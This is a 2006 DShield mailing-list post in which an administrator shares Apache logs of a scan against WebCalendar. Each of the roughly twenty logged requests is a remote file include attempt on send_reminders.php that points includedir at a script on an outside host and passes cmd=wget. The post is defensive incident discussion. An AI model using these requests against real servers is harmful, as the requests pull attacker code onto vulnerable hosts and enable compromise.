[Dshield] Webcal Exploit?

Mon Feb 6 17:57:20 GMT 2006

On Mon, 6 Feb 2006 07:16:06 -0500
"George A. Theall" <theall at tifaware.com> opined:
> On Sun, Feb 05, 2006 at 01:06:02PM -0500, David Cary Hart wrote:
> 
> > Watching the apache logs, I am seeing clients looking for webcal. That usually
> > suggests that the nitwits have found a new php injection scheme.
> 
> I'm not aware of anything recent.  Do you have any log sample to share?
> 
> There were some XSS flaws in Webcal announced last December (Bugtraq ID
> 15917), but this was not code injection. 
> 
> Is it possible they're targetting webcalendar rather than webcal? There
> was a remote file include flaw in its 'send_reminders.php' script
> announced last August (Bugtraq ID 14651). 
> 
Here was the first one. I have seen four or five since, all the same pattern
except domain instead of IPA:

81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/Webcalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/calendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/calendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/Webcal/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcal/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/WebCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/WebCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/webCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/webCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/Calender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Calender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/WEBCALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/WEBCALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/CALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/CALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/webcalender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/webcalender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/calendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/calendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/Webcal/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcal/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/Webcalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/WebCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/WebCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/Calender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Calender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/webCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/webCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/webcalender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/webcalender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/WEBCALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/WEBCALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/CALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/CALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


-- 
Our DNSRBL - 
           Eliminate Spam: http://www.TQMcube.com
          Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
            Zombie Graphs: http://www.TQMcube.com/zombies.php